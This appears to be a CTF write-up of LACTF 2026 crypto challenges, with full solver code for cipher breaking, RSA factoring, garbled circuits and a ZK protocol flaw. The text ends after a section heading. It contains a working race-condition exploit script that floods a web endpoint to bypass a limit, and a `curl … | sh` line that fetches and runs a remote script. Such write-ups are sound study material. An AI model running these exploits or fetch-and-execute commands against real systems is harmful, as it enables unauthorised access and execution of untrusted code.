# LACTF 2026

## crypto

### lazy-bigrams

#### Description

We are given `attachments/chall.py` and a ciphertext `attachments/ct.txt`.

`chall.py` does:

1. `pt = phonetic_mapping(phonetic_mapping(flag))`
2. `ct = encryption(pt)`

`phonetic_mapping()` replaces each allowed character with its NATO-style word (plus words for `_{}0-9`), and if the resulting mapped string length is odd it appends a single padding letter `"X"`.

`encryption()` removes non-letters, groups the plaintext into disjoint 2-letter blocks (bigrams), and substitutes each plaintext bigram via a random permutation of all 26^2 possible bigrams. The ciphertext is emitted as 2-letter bigrams.

Flag format is `lactf{...}` and is all lowercase.

#### Solution

Model this as a substitution cipher over the set of ciphertext bigrams that appear.

Let each distinct ciphertext bigram be a “symbol”. Each symbol maps injectively to a plaintext bigram in `AA..ZZ` (0..675). Expanding those plaintext bigrams yields the full plaintext letter stream `s2`.

Key observation: `s2` is (almost always) a pure concatenation of NATO phonetic words for letters `A-Z`, because it is the output of the *second* `phonetic_mapping()` (the only possible exception is a single trailing padding letter `X`, which is appended to make the length even).

Constraints used:

1. **Injective mapping**: ciphertext symbol -> plaintext bigram (all-different).
2. **Known prefix crib**: because the flag starts with `lactf{`, the start of `s2 = phonetic_mapping(phonetic_mapping("lactf{"))` is fully known, which fixes many symbol->bigram assignments immediately.
3. **Regular-language constraint**: `s2` must be accepted by a DFA for “concatenation of NATO words” (or that plus a final padding `X`). This is enforced with OR-Tools CP-SAT `AddAutomaton`.

Once `s2` is recovered, decode:

* `s2` -> `s1` by tokenizing NATO words back into letters.
* `s1` -> `flag` by tokenizing the full `PHONETIC_MAP` words back into characters.

All code (solver + decoding) is below:

```python
#!/usr/bin/env python3
import re
from dataclasses import dataclass
from pathlib import Path

from ortools.sat.python import cp_model

HERE = Path(__file__).resolve().parent
CT_PATH = HERE / "attachments" / "ct.txt"

ALPH = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
A2I = {c: i for i, c in enumerate(ALPH)}
I2A = {i: c for i, c in enumerate(ALPH)}

# From attachments/chall.py
PHONETIC_MAP = {
    "A": "ALPHA",
    "B": "BRAVO",
    "C": "CHARLIE",
    "D": "DELTA",
    "E": "ECHO",
    "F": "FOXTROT",
    "G": "GOLF",
    "H": "HOTEL",
    "I": "INDIA",
    "J": "JULIETT",
    "K": "KILO",
    "L": "LIMA",
    "M": "MIKE",
    "N": "NOVEMBER",
    "O": "OSCAR",
    "P": "PAPA",
    "Q": "QUEBEC",
    "R": "ROMEO",
    "S": "SIERRA",
    "T": "TANGO",
    "U": "UNIFORM",
    "V": "VICTOR",
    "W": "WHISKEY",
    "X": "XRAY",
    "Y": "YANKEE",
    "Z": "ZULU",
    "_": "UNDERSCORE",
    "{": "OPENCURLYBRACE",
    "}": "CLOSECURLYBRACE",
    "0": "ZERO",
    "1": "ONE",
    "2": "TWO",
    "3": "THREE",
    "4": "FOUR",
    "5": "FIVE",
    "6": "SIX",
    "7": "SEVEN",
    "8": "EIGHT",
    "9": "NINE",
}

NATO_WORDS = [PHONETIC_MAP[chr(ord("A") + i)] for i in range(26)]


def clean_alpha(s: str) -> str:
    return "".join(ch for ch in s.upper() if ch in ALPH)


def phonetic_mapping_no_pad(ptext: str) -> str:
    """phonetic_mapping() but without appending trailing 'X' padding."""
    cleanptext = re.sub(r"[^a-zA-Z0-9_{}]", "", ptext).upper()
    return "".join(PHONETIC_MAP[c] for c in cleanptext)


def phonetic_mapping_letters_no_pad(ptext: str) -> str:
    """phonetic_mapping() but restricted to A-Z input and without trailing pad."""
    cleanptext = re.sub(r"[^A-Z]", "", ptext.upper())
    return "".join(PHONETIC_MAP[c] for c in cleanptext)


def s2_prefix_for_flag_prefix(flag_prefix: str) -> str:
    """Compute s2 = phonetic_mapping(phonetic_mapping(flag_prefix)) without pad."""
    s1 = phonetic_mapping_no_pad(flag_prefix)
    return phonetic_mapping_letters_no_pad(s1)


def build_constraints_from_prefix(ct_pairs: list[str], flag_prefix: str) -> tuple[dict[str, str], str]:
    s2_pref = clean_alpha(s2_prefix_for_flag_prefix(flag_prefix))
    pref_pairs = [s2_pref[i : i + 2] for i in range(0, (len(s2_pref) // 2) * 2, 2)]
    m: dict[str, str] = {}
    for i, pp in enumerate(pref_pairs):
        cp = ct_pairs[i]
        if cp in m and m[cp] != pp:
            raise RuntimeError(f"prefix constraint conflict at pos={i}: {cp} -> {m[cp]} vs {pp}")
        m[cp] = pp
    return m, s2_pref


class TrieNode:
    __slots__ = ("nxt", "term")

    def __init__(self):
        self.nxt: dict[int, int] = {}
        self.term: bool = False


@dataclass
class Automaton:
    initial_state: int
    final_states: list[int]
    transitions: list[tuple[int, int, int]]


def build_nato_automaton() -> Automaton:
    # Deterministic DFA: trie of words + "restart at root after finishing a word".
    nodes: list[TrieNode] = [TrieNode()]  # root=0
    for w in NATO_WORDS:
        cur = 0
        for ch in w:
            a = A2I[ch]
            nxt = nodes[cur].nxt.get(a)
            if nxt is None:
                nxt = len(nodes)
                nodes[cur].nxt[a] = nxt
                nodes.append(TrieNode())
            cur = nxt
        nodes[cur].term = True

    root = 0
    dead = len(nodes)
    transitions: list[tuple[int, int, int]] = []

    # Dead state loops.
    for a in range(26):
        transitions.append((dead, a, dead))

    # Trie transitions; from terminal states, missing edges behave like root edges.
    for s, node in enumerate(nodes):
        for a in range(26):
            if a in node.nxt:
                transitions.append((s, a, node.nxt[a]))
                continue
            if node.term and (a in nodes[root].nxt):
                transitions.append((s, a, nodes[root].nxt[a]))
            else:
                transitions.append((s, a, dead))

    final_states = [i for i, n in enumerate(nodes) if n.term]
    return Automaton(initial_state=root, final_states=final_states, transitions=transitions)


def decode_by_words(s: str, word_to_val: dict[str, str], *, allow_trailing_x: bool = True) -> str:
    # Greedy longest-match using a trie (word sets are prefix-free here).
    inv_trie: dict[str, dict] = {}
    for w, v in word_to_val.items():
        cur = inv_trie
        for ch in w:
            cur = cur.setdefault(ch, {})
        cur[""] = v  # terminal marker

    i = 0
    out: list[str] = []
    while i < len(s):
        cur = inv_trie
        j = i
        found = None
        found_j = None
        while j < len(s) and s[j] in cur:
            cur = cur[s[j]]
            j += 1
            if "" in cur:
                found = cur[""]
                found_j = j
        if found is None:
            if allow_trailing_x and (i == len(s) - 1) and (s[i] == "X"):
                break
            raise ValueError(f"decode failed at offset {i}: {s[i:i+60]}")
        out.append(found)
        i = found_j
    return "".join(out)


def solve(max_time: float = 180.0, workers: int = 8) -> str:
    ct = clean_alpha(CT_PATH.read_text())
    assert len(ct) % 2 == 0
    ct_pairs = [ct[i : i + 2] for i in range(0, len(ct), 2)]
    n_pairs = len(ct_pairs)

    uniq = sorted(set(ct_pairs))
    sym_id = {bg: i for i, bg in enumerate(uniq)}
    ct_syms = [sym_id[p] for p in ct_pairs]

    crib, s2_pref = build_constraints_from_prefix(ct_pairs, "lactf{")
    fixed: dict[int, int] = {}
    for c_bg, p_bg in crib.items():
        sid = sym_id[c_bg]
        pid = A2I[p_bg[0]] * 26 + A2I[p_bg[1]]
        fixed[sid] = pid

    aut = build_nato_automaton()

    def try_solve(*, pad_x: bool) -> str | None:
        model = cp_model.CpModel()

        # Cipher-symbol -> plaintext bigram id in [0, 675].
        bg = [model.NewIntVar(0, 26 * 26 - 1, f"bg_{s}") for s in range(len(uniq))]
        model.AddAllDifferent(bg)
        for sid, pid in fixed.items():
            model.Add(bg[sid] == pid)

        # Bigram -> letters.
        first_arr = [i // 26 for i in range(26 * 26)]
        second_arr = [i % 26 for i in range(26 * 26)]
        l0 = [model.NewIntVar(0, 25, f"l0_{s}") for s in range(len(uniq))]
        l1 = [model.NewIntVar(0, 25, f"l1_{s}") for s in range(len(uniq))]
        for s in range(len(uniq)):
            model.AddElement(bg[s], first_arr, l0[s])
            model.AddElement(bg[s], second_arr, l1[s])

        # Decrypted s2 letters.
        L = [model.NewIntVar(0, 25, f"L_{i}") for i in range(2 * n_pairs)]
        for k, sid in enumerate(ct_syms):
            model.Add(L[2 * k] == l0[sid])
            model.Add(L[2 * k + 1] == l1[sid])

        # Known s2 prefix from lactf{
        for i, ch in enumerate(s2_pref):
            model.Add(L[i] == A2I[ch])

        # Handle possible final padding 'X' by trying both cases.
        if pad_x:
            model.Add(L[-1] == A2I["X"])
            model.AddAutomaton(L[:-1], aut.initial_state, aut.final_states, aut.transitions)
        else:
            model.AddAutomaton(L, aut.initial_state, aut.final_states, aut.transitions)

        err = model.Validate()
        if err:
            raise RuntimeError(err)

        solver = cp_model.CpSolver()
        solver.parameters.max_time_in_seconds = max_time
        solver.parameters.num_search_workers = workers
        res = solver.Solve(model)
        if res not in (cp_model.OPTIMAL, cp_model.FEASIBLE):
            return None

        return "".join(I2A[int(solver.Value(v))] for v in L)

    s2 = try_solve(pad_x=False) or try_solve(pad_x=True)
    if s2 is None:
        raise RuntimeError("no solution")

    # Decode s2 -> s1 letters (A-Z)
    inv_az = {PHONETIC_MAP[chr(ord("A") + i)]: chr(ord("A") + i) for i in range(26)}
    s1 = decode_by_words(s2, inv_az, allow_trailing_x=True)

    # Decode s1 -> flag characters
    inv_full = {v: k for k, v in PHONETIC_MAP.items()}
    flag = decode_by_words(s1, inv_full, allow_trailing_x=True).lower()
    return flag


if __name__ == "__main__":
    print(solve())
```

Running it prints the flag: `lactf{n0t_r34lly_4_b1gr4m_su8st1tu7ion_bu7_1_w1ll_tak3_1t_f0r_n0w}`

### misdirection

#### Description

A snake game web app backed by NTRUSign cryptographic signatures. The `/grow` endpoint increments a counter if you provide a valid NTRUSign signature for the current count, but limits growth to `current_count < 4`. The `/flag` endpoint requires `current_count >= 14`. The server uses gunicorn with `gthread` (1 worker, 80 threads) and has no locking around the check-and-increment logic.

#### Solution

The "misdirection" is NTRUSign itself — you don't need to break the cryptography. The vulnerability is a **race condition** in the `/grow` endpoint's TOCTOU (time-of-check-time-of-use) pattern:

```python
if current_count < 4 and client_count == current_count:
    # ... verify signature (SLOW for non-cached) ...
    if verif:
        current_count += 1
        ready_status["status"] = False
        # ... sign new count (SLOW) ...
```

Multiple threads can pass the `current_count < 4` check before any thread increments. Once past the check, each thread independently increments the counter regardless of its new value.

**Key trick — cache busting:** The server caches signatures by string. Cached lookups are instant (no race window). To force the slow `NTRU.Verifying()` code path (which takes \~100ms due to O(N^2) polynomial multiplication), we modify each signature string to be unique while parsing identically. Adding leading zeros to the nonce `r` (e.g., `==0` → `==00`, `==000`, etc.) produces different cache keys but `int("00") == int("0") == 0`.

**Simultaneous delivery:** To maximize threads passing the check before any increments, we use Python `multiprocessing` with a `Barrier`: each subprocess pre-establishes its TCP+TLS connection, waits at the barrier until all are connected, then all send their HTTP request simultaneously.

With 80 concurrent requests, enough threads (14+) enter the slow verification path simultaneously and all increment the counter past the limit. Then we call `/flag`.

```python
#!/usr/bin/env python3
import multiprocessing
import socket
import ssl
import requests
import sys
import time
import json
import re
from urllib.parse import urlparse

BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8000"
NUM_REQUESTS = 80

def wait_for_ready():
    while True:
        try:
            r = requests.get(f"{BASE_URL}/status", timeout=10)
            if r.json().get("status"):
                return
        except Exception:
            pass
        time.sleep(2)

def modify_signature(sig, variant):
    """Add leading zeros to nonce r to bust the signature cache."""
    parts = sig.split("\n==")
    header_and_coeffs = parts[0]
    r_and_footer = parts[1]
    r_line_end = r_and_footer.index("\n")
    r_value = r_and_footer[:r_line_end]
    footer = r_and_footer[r_line_end:]
    return header_and_coeffs + "\n==" + "0" * variant + r_value + footer

def blast_with_multiprocess(sigs):
    parsed = urlparse(BASE_URL)
    host = parsed.hostname
    port = parsed.port or (443 if parsed.scheme == 'https' else 80)
    use_ssl = parsed.scheme == 'https'
    barrier = multiprocessing.Barrier(len(sigs), timeout=30)
    results = multiprocessing.Manager().dict()

    def worker(idx, sig, barrier, results):
        body = json.dumps({"count": 0, "sig": sig})
        request = (
            f"POST /grow HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Content-Type: application/json\r\n"
            f"Content-Length: {len(body)}\r\n"
            f"Connection: close\r\n\r\n{body}"
        )
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(120)
        if use_ssl:
            ctx = ssl.create_default_context()
            sock = ctx.wrap_socket(sock, server_hostname=host)
        sock.connect((host, port))
        try:
            barrier.wait()
        except Exception:
            pass
        sock.sendall(request.encode())
        response = b""
        while True:
            try:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                response += chunk
            except socket.timeout:
                break
        sock.close()
        try:
            body_start = response.find(b"\r\n\r\n") + 4
            resp_body = response[body_start:].decode()
            if b"Transfer-Encoding: chunked" in response:
                decoded, pos = "", 0
                while pos < len(resp_body):
                    nl = resp_body.find("\r\n", pos)
                    if nl == -1: break
                    sz = int(resp_body[pos:nl], 16)
                    if sz == 0: break
                    decoded += resp_body[nl+2:nl+2+sz]
                    pos = nl + 2 + sz + 2
                resp_body = decoded
            results[idx] = json.loads(resp_body)
        except Exception as e:
            results[idx] = {"msg": f"error: {e}"}

    procs = []
    for i, sig in enumerate(sigs):
        p = multiprocessing.Process(target=worker, args=(i, sig, barrier, results))
        procs.append(p)
    for p in procs:
        p.start()
    for p in procs:
        p.join(timeout=300)
    return [results.get(i, {"msg": "timeout"}) for i in range(len(sigs))]

def main():
    for attempt in range(5):
        wait_for_ready()
        count = requests.get(f"{BASE_URL}/current-count").json()["count"]
        if count >= 14:
            result = requests.post(f"{BASE_URL}/flag", json={}).json()
            print(result["msg"])
            return
        if count != 0:
            requests.get(f"{BASE_URL}/regenerate-keys", timeout=300)
            wait_for_ready()
        zero_sig = requests.get(f"{BASE_URL}/zero-signature").json()["signature"]
        sigs = [modify_signature(zero_sig, i) for i in range(1, NUM_REQUESTS + 1)]
        responses = blast_with_multiprocess(sigs)
        grown = sum(1 for d in responses if "grown" in d.get("msg", ""))
        count = requests.get(f"{BASE_URL}/current-count").json()["count"]
        print(f"Attempt {attempt+1}: {grown} grown, count={count}")
        if count >= 14:
            wait_for_ready()
            result = requests.post(f"{BASE_URL}/flag", json={}).json()
            print(result["msg"])
            return
        requests.get(f"{BASE_URL}/regenerate-keys", timeout=300)
        time.sleep(5)

if __name__ == "__main__":
    main()
```

**Flag:** `lactf{d0nt_b3_n0nc00p3r4t1v3_w1th_my_s3rv3r}`

### not-so-lazy-trigrams

#### Description

Finally got the energy to write a trigram substitution cipher. Surely three shuffles are better than one!

Files: `ct.txt`, `chall.py`

#### Solution

**Analysis of the cipher:**

The challenge implements a "trigram substitution cipher" using three independent alphabet shuffles (`shufflei`, `shufflej`, `shufflek`). The key insight is that despite appearing to operate on trigrams (3-letter blocks), the cipher actually decomposes into **three independent monoalphabetic substitution ciphers** based on character position mod 3:

* Position 0, 3, 6, ... → substituted by `shufflei`
* Position 1, 4, 7, ... → substituted by `shufflej`
* Position 2, 5, 8, ... → substituted by `shufflek`

This is because `sub_trigrams[a*676 + b*26 + c] = chr(shufflei[a]) + chr(shufflej[b]) + chr(shufflek[c])`, meaning each character in a trigram is substituted independently.

The `formatter` function removes spaces from the output but preserves all other punctuation from the original plaintext.

**Cracking approach:**

1. The ciphertext ends with a visible flag structure: `zjlel{heqmz_dgk_tevr_tk_vnnds_c_imcqaeyde_ug_byndu_e_jjaogy_rqqnisoqe_cwtnamd}`
2. We know `zjlel` → `lactf`, which gives us initial mappings across all three ciphers.
3. From the flag word length pattern `[5, 3, 4, 2, 5, 1, 9, 2, 5, 1, 6, 9, 7]` and the challenge theme ("not so lazy"), we hypothesize the flag content is: `still_too_lazy_to_write_a_plaintext_so_heres_a_random_wikipedia_article`
4. Verifying this hypothesis against the ciphertext shows **perfect consistency** across all three cipher mappings — no contradictions.
5. Partial decryption of the main text confirms it's a Wikipedia article about circular polarization, validating the hypothesis.

**Flag:** `lactf{still_too_lazy_to_write_a_plaintext_so_heres_a_random_wikipedia_article}`

**Solver code:**

```python
import re
from collections import Counter
import string
import random
import math

ct_raw = open('attachments/ct.txt').read()

# Extract all alpha characters
ct_alpha = re.sub(r'[^a-zA-Z]', '', ct_raw).lower()

# Flag content between { and }
flag_start_raw = ct_raw.find('zjlel{')
flag_content_raw = ct_raw[flag_start_raw+6:ct_raw.find('}')]

# Word lengths: [5, 3, 4, 2, 5, 1, 9, 2, 5, 1, 6, 9, 7]
# Hypothesis based on challenge theme and word pattern
hypothesis = "still_too_lazy_to_write_a_plaintext_so_heres_a_random_wikipedia_article"
hyp_alpha = re.sub(r'[^a-zA-Z]', '', hypothesis).lower()
flag_content_alpha = re.sub(r'[^a-zA-Z]', '', flag_content_raw).lower()

# Determine starting position in alpha stream for flag content
alpha_before = re.sub(r'[^a-zA-Z]', '', ct_raw[:flag_start_raw+6]).lower()
flag_alpha_start = len(alpha_before)

# Build and verify cipher mappings
mappings = [{}, {}, {}]
consistent = True
for i, (ct_c, pt_c) in enumerate(zip(flag_content_alpha, hyp_alpha)):
    cidx = (flag_alpha_start + i) % 3
    if ct_c in mappings[cidx]:
        if mappings[cidx][ct_c] != pt_c:
            print(f"INCONSISTENCY: cipher {cidx}, {ct_c} -> {mappings[cidx][ct_c]} vs {pt_c}")
            consistent = False
    else:
        mappings[cidx][ct_c] = pt_c

# Also add "lactf" -> "zjlel" mappings
lactf_start = len(re.sub(r'[^a-zA-Z]', '', ct_raw[:flag_start_raw]).lower())
for i, (ct_c, pt_c) in enumerate(zip('zjlel', 'lactf')):
    cidx = (lactf_start + i) % 3
    mappings[cidx][ct_c] = pt_c

print(f"All mappings consistent: {consistent}")
print(f"Flag: lactf{{{hypothesis}}}")
```

### sisyphus

#### Description

A garbled circuit challenge implementing Yao's garbled circuits with the free XOR optimization. The circuit computes `AND(0, your_choice)`, which always outputs 0 regardless of input. To get the flag, you must provide the output wire's **one** label key — a value that should be unreachable through normal evaluation.

#### Solution

The circuit uses the **half-gates / point-and-permute** technique where one garbled table entry (at pointer position (0,0)) is implicit (derived via `decrypt_zeros`), and the other three entries are stored explicitly.

In the free XOR scheme, every wire has `one.key = zero.key ⊕ Δ` for a global secret `Δ`. Normal evaluation only yields `wc.zero` (since AND(0, x) = 0). To get `wc.one.key = wc.zero.key ⊕ Δ`, we need to recover `Δ`.

**The vulnerability**: For an AND gate, three of the four truth table rows encrypt `wc.zero` and one encrypts `wc.one`. The encrypted key at position (i,j) is `E(la.key) ⊕ E(lb.key) ⊕ lc.key`, where `E(k) = AES_k(iv‖0)`. Due to the algebraic structure of free XOR (where paired labels differ by `Δ` in key-space), XORing all three explicit table entries causes all the AES terms to cancel:

```
ek[0][1] ⊕ ek[1][0] ⊕ ek[1][1] = Δ
```

This holds regardless of the random pointer bit assignment. With `Δ` recovered, we evaluate normally to get `c0 = wc.zero.key`, then compute `c1 = c0 ⊕ Δ`.

```python
#!/usr/bin/env python3
from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.strxor import strxor

r = remote('chall.lac.tf', 31182)

r.recvuntil(b'decide your fate: ')
r.sendline(b'0')

# Parse wire labels
line0 = r.recvline().decode().strip()  # wire 0: key_hex ptr
line1 = r.recvline().decode().strip()  # wire 1: key_hex ptr

parts0 = line0.split()
key_a = bytes.fromhex(parts0[2])
ptr_a = int(parts0[3])

parts1 = line1.split()
key_b = bytes.fromhex(parts1[2])
ptr_b = int(parts1[3])

# Parse 3 table entries (positions (0,1), (1,0), (1,1))
table_entries = {}
for i, j in ((0, 1), (1, 0), (1, 1)):
    line = r.recvline().decode().strip()
    parts = line.split()
    ek = bytes.fromhex(parts[0])
    ep = int(parts[1])
    table_entries[(i, j)] = (ek, ep)

# Parse IV
iv_line = r.recvline().decode().strip()
iv = bytes.fromhex(iv_line.split()[-1])

# KEY INSIGHT: delta = XOR of the three encrypted keys
ek01 = table_entries[(0, 1)][0]
ek10 = table_entries[(1, 0)][0]
ek11 = table_entries[(1, 1)][0]
delta = strxor(strxor(ek01, ek10), ek11)

# Evaluate normally to get c0 (wc.zero.key)
BUF_LEN = 16

if ptr_a == 0 and ptr_b == 0:
    aes1 = AES.new(key_a, AES.MODE_CTR, nonce=iv)
    aes2 = AES.new(key_b, AES.MODE_CTR, nonce=iv)
    ks2 = aes2.decrypt(bytes(BUF_LEN))
    c0 = aes1.decrypt(ks2)
else:
    ek, ep = table_entries[(ptr_a, ptr_b)]
    aes1 = AES.new(key_a, AES.MODE_CTR, nonce=iv)
    aes2 = AES.new(key_b, AES.MODE_CTR, nonce=iv)
    dec2 = aes2.decrypt(ek)
    c0 = aes1.decrypt(dec2)

# c1 = c0 XOR delta
c1 = strxor(c0, delta)

r.recvuntil(b'mountain: ')
r.sendline(c1.hex().encode())
print(r.recvall(timeout=5).decode())
```

**Flag**: `lactf{m4yb3_h3_w4s_h4ppy_aft3r_4all}`

### six seven

#### Description

RSA encryption where primes p and q are 256-digit numbers composed only of digits 6 and 7, with the last digit always being 7. We're given `n = p*q` and `c = pow(m, 65537, n)` and need to decrypt the flag.

#### Solution

Since every digit of p and q is either 6 or 7, we can recover p digit-by-digit from the least significant digit (LSB) upward using the constraint that `n = p * q`.

**Key insight:** If we know `p mod 10^k`, we can compute `q mod 10^k = n * p^(-1) mod 10^k` (since p ends in 7, it's always invertible mod powers of 10). We then check whether the k-th digit of q is in {6, 7}. If not, that candidate is pruned.

At each step we try extending p's next digit with both 6 and 7 (2 choices), but only \~2/10 of candidates survive the digit check on q. The branching factor of 2 \* 0.2 = 0.4 means false candidates die off exponentially, leaving only 1-4 candidates throughout the entire search.

After recovering all 256 digits of p, we verify `n % p == 0`, compute `phi = (p-1)(q-1)`, find `d = e^(-1) mod phi`, and decrypt `m = c^d mod n`.

```python
#!/usr/bin/env python3
from pwn import *
from Crypto.Util.number import long_to_bytes
import subprocess, os

POW_BIN = os.path.expanduser("~/.cache/redpwnpow/redpwnpow-v0.1.2-linux-amd64")

r = remote('chall.lac.tf', 31180)

# Handle proof of work
r.recvuntil(b'proof of work:\n')
pow_cmd = r.recvline().decode().strip()
r.recvuntil(b'solution: ')
challenge = pow_cmd.split()[-1]
result = subprocess.run([POW_BIN, challenge], capture_output=True, text=True, timeout=120)
r.sendline(result.stdout.strip().encode())

# Parse n and c
n = int(r.recvline().decode().strip().split('=')[1])
c = int(r.recvline().decode().strip().split('=')[1])
r.close()

# Factor n digit-by-digit from LSB
# Both p and q have digits in {6,7} and end in 7
candidates = [7]

for k in range(1, 256):
    mod = 10 ** (k + 1)
    n_mod = n % mod
    new_candidates = []
    for p_cand in candidates:
        for d in [6, 7]:
            p_new = p_cand + d * (10 ** k)
            q_new = (n_mod * pow(p_new, -1, mod)) % mod
            q_digit = (q_new // (10 ** k)) % 10
            if q_digit in (6, 7):
                new_candidates.append(p_new)
    candidates = new_candidates

for p in candidates:
    if n % p == 0:
        q = n // p
        phi = (p - 1) * (q - 1)
        d = pow(65537, -1, phi)
        m = pow(c, d, n)
        print(long_to_bytes(m).decode())
        break
```

**Flag:** `lactf{wh4t_67s_15_blud_f4ct0r1ng_15_blud_31nst31n}`

### six seven again

#### Description

LA CTF will take place on Feburary 6 and Feburary 7, 2026.

`nc chall.lac.tf 31181`

RSA challenge where one prime `p` is generated with a highly structured form: 67 digits of '6', followed by 67 digits each randomly '6' or '7', followed by 67 digits of '7' (201 decimal digits total). The other prime `q` is a standard 670-bit prime.

#### Solution

The prime `p` has the form:

```
p = base + 10^67 * x
```

where `base = 6 * (10^201 - 10^67)/9 + 7 * (10^67 - 1)/9` is fully known (the contribution from the fixed 6s and 7s, plus the minimum contribution of 6 from each middle digit), and `x = sum(b_i * 10^i for i in 0..66)` with each `b_i ∈ {0,1}` represents the unknown bits (whether each middle digit is 6 or 7).

The key insight is that `x < (10^67 - 1)/9 ≈ 10^66`, which is roughly 219 bits. Since `p ≈ 10^200` (668 bits) and `q ≈ 670` bits, `N ≈ 1338` bits. Coppersmith's method can find small roots of a polynomial modulo an unknown factor of N when the root is smaller than `N^(β²)` where `β ≈ 0.5`. Here `N^0.25 ≈ 2^334`, and our unknown `x ≈ 2^219 < 2^334`, so Coppersmith's method applies directly.

We construct the monic polynomial `f(x) = x + base * (10^67)^{-1} mod N` and use SageMath's `small_roots()` to recover `x`, then factor `N = p * q` and decrypt.

```python
#!/usr/bin/env python3
from pwn import *
from Crypto.Util.number import long_to_bytes
from sage.all import *
import subprocess

io = remote('chall.lac.tf', 31181)

# Handle proof of work
io.recvuntil(b'proof of work:\n')
pow_cmd = io.recvline().decode().strip()
io.recvuntil(b'solution:')
challenge = pow_cmd.split()[-1]
result = subprocess.run(
    ['bash', '-c', f'curl -sSfL https://pwn.red/pow | sh -s {challenge}'],
    capture_output=True, text=True, timeout=120
)
io.sendline(result.stdout.strip().encode())

data = io.recvall(timeout=30).decode().strip()
io.close()

lines = [l.strip() for l in data.split('\n') if '=' in l]
vals = {}
for line in lines:
    key, val = line.split('=', 1)
    vals[key.strip()] = int(val.strip())

n = vals['n']
c = vals['c']

# p = 666...6 (67 digits) || mixed 6/7 (67 digits) || 777...7 (67 digits)
# p = base + 10^67 * x where x has 67 binary digits (each 0 or 1)
base = 6 * (10**201 - 10**67) // 9 + 7 * (10**67 - 1) // 9

# Coppersmith's method - make polynomial monic
P = PolynomialRing(Zmod(n), 'x')
x = P.gen()
inv_coeff = inverse_mod(ZZ(10)**67, n)
f = x + ZZ(base) * ZZ(inv_coeff)

X = (10**67 - 1) // 9 + 1
roots = f.small_roots(X=X, beta=0.49, epsilon=1/32)

x0 = int(roots[0])
p = base + 10**67 * x0
q = n // p
assert p * q == n

phi = (p - 1) * (q - 1)
e = 65537
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"Flag: {flag}")
```

**Flag:** `lactf{n_h4s_1337_b1ts_b3c4us3_667+670=1337}`

### slow-gold

#### Description

The server (EMP-ZK arithmetic) commits to two secret length-10 vectors `vec1`, `vec2` over `F_p` where `p = 2^61-1`, and proves in zero-knowledge that they are a permutation by checking: `prod_i (vec1[i] + X) == prod_i (vec2[i] + X)` for verifier-chosen `X`.

After the proof, the verifier must submit the 10 elements of `vec1` (order doesn’t matter) to get the flag.

#### Solution

**Bug 1: Broken Batched Multiplication Check Only Checks One Gate**

In `attachments/dist/emp-zk/emp-zk/emp-zk-arith/ostriple.h`, the challenge modified the coefficient generation for the multiplication-gate batch check:

```cpp
uni_hash_coeff_gen(chi, seed, 1);
```

This should have been `task_n`, but with `1` only `chi[0]` is derived from the seed and the rest of the check is effectively not covered.

Worse, the loop bounds are broken:

```cpp
for (uint32_t i = start + task_n - 1, k = 0; i < start + task_n; ++i, ++k)
```

Because `i` is `uint32_t`, starting at `start + task_n - 1` combined with the `< start + task_n` condition makes the loop execute exactly once: it “checks” only the last multiplication gate in that batch.

So, per connection, the verifier learns data about exactly one multiplication gate.

**Bug 2: Verifier MAC Key `delta` Can Be Forced to 0**

EMP-ZK’s arithmetic backend uses an information-theoretic MAC: `mac = key + delta * value (mod p)`, where `delta` is sampled by the verifier.

Nothing prevents choosing `delta = 0`. With `delta=0`, `mac == key` and the broken one-gate check becomes a linear relation between the (unknown) gate inputs instead of a quadratic.

We patch the verifier to set `delta=0` and to record the one checked multiplication gate’s transcript `(seed, V, ka, kb, kc)` plus `delta` (sanity).

**What The One-Gate Leak Gives**

Let the checked multiplication gate have secret inputs `a`, `b`, output `c = a*b`. The verifier’s per-wire keys are `ka`, `kb`, `kc` and the prover sends `V`.

From the check derivation, with `delta=0`:

`kb*a + ka*b = (V/seed) + kc (mod p)`

In this circuit, the checked gate is the final multiplication gate for `vec2`:

`a = g(X) = prod_{i=0..8} (vec2[i] + X)`\
`b = last + X` where `last = vec2[9]`

So each connection at chosen `X` yields:

`kb*g(X) + ka*(last + X) = rhs (mod p)` where `rhs = (V/seed) + kc`.

**Solve With One 10x10 Linear System (10 Connections)**

Write `g(X)` as a monic degree-9 polynomial:

`g(X) = c0 + c1*X + ... + c8*X^8 + X^9`

Rearrange the leaked equation into a linear equation in the 10 unknowns `(c0..c8, last)`:

`sum_{j=0..8} (kb*X^j)*c_j + ka*last = rhs - ka*X - kb*X^9`

Collect this for 10 distinct `X` values (we used `X=0..9`), solve the resulting 10x10 system over `F_p` with Gaussian elimination to recover:

1. `last = vec2[9]`
2. the coefficients `c0..c8` of `g(X)`

**Factor To Recover The Other 9 Elements**

`g(X) = prod_{i=0..8} (vec2[i] + X)` so its roots are `X = -vec2[i]` for `i=0..8`.

Factor `g(X)` over `F_p` to get these linear factors, recover `vec2[i] = -root (mod p)`, and then submit the 10-element multiset `{vec2[0..9]}` as the guess for `vec1`.

This works because `vec1` is a permutation of `vec2`.

**Notes On Connectivity**

EMP `NetIO` uses `inet_addr()` and does not resolve DNS hostnames. Use an IP (for LACTF it was `34.169.138.235`) via `--host` or `SLOW_GOLD_HOST`.

**Final Flag**

`lactf{1_h0p3_y0u_l1v3_th1s_0ne_t0_th3_fullest}`

***

#### Code

Below is all code used for the solve (patches + solver).

**1) Leak Struct (new)**

File: `attachments/dist/emp-zk/emp-zk/emp-zk-arith/leak.h`

```cpp
#ifndef EMP_ZK_ARITH_LEAK_H__
#define EMP_ZK_ARITH_LEAK_H__
// Minimal transcript capture for CTF solving (verifier-side).
// This is intentionally tiny and only records the broken mult-check's single gate.

#include <cstdint>

namespace emp {

struct EmpZkAndGateLeak {
  bool have = false;
  uint64_t delta = 0;

  // The coefficient used in the (broken) linear combination.
  uint64_t seed = 0;

  // Prover-sent check sums (before verifier mutates V).
  uint64_t U = 0;
  uint64_t V = 0;

  // Verifier-side keys for the single checked multiplication gate.
  uint64_t ka = 0;
  uint64_t kb = 0;
  uint64_t kc = 0;

  // Index in the andgate buffers (useful for sanity).
  uint32_t gate_i = 0;
};

extern EmpZkAndGateLeak g_emp_zk_andgate_leak;

} // namespace emp

#endif
```

**2) Define Global (new)**

